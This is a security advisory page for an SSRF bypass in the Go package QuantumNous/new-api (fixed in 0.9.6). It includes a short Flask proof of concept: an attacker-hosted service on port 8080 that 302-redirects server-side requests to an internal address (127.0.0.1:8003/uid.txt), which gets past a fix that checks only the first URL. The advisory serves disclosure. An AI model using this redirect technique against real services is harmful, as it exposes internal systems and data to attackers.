GHSA-9f46-w24h-69w4

Suggest an improvement
Source
https://github.com/advisories/GHSA-9f46-w24h-69w4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/11/GHSA-9f46-w24h-69w4/GHSA-9f46-w24h-69w4.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-9f46-w24h-69w4
Aliases
Published
2025-11-24T20:05:21Z
Modified
2025-12-17T00:50:03.597323Z
Severity
  • 8.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N CVSS Calculator
Summary
new-api is vulnerable to SSRF Bypass
Details

Summary

A recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.

Details

Use the following script to deploy on the attacker's server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.

from flask import Flask, redirect  

app = Flask(__name__)  

@app.route('/redirect')  
def ssrf_redirect():  
    return redirect('http://127.0.0.1:8003/uid.txt', code=302)  

if __name__ == '__main__':  
    app.run(host='0.0.0.0', port=8080)

Then, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed. <img width="663" height="60" alt="image" src="https://github.com/user-attachments/assets/2f296cff-510d-4cfe-8509-518e747bf8fe" /> At the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests. <img width="717" height="79" alt="image" src="https://github.com/user-attachments/assets/d6b6d2cc-280b-45b5-9946-10b7891bf017" />

Impact

Using 302 redirects to bypass previous SSRF security fixes

Database specific
{
    "cwe_ids": [
        "CWE-918"
    ],
    "github_reviewed_at": "2025-11-24T20:05:21Z",
    "github_reviewed": true,
    "nvd_published_at": "2025-11-25T00:15:46Z",
    "severity": "HIGH"
}
References

Affected packages

Go / github.com/QuantumNous/new-api

Package

Name
github.com/QuantumNous/new-api
View open source insights on deps.dev
Purl
pkg:golang/github.com/QuantumNous/new-api

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.9.6

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/11/GHSA-9f46-w24h-69w4/GHSA-9f46-w24h-69w4.json"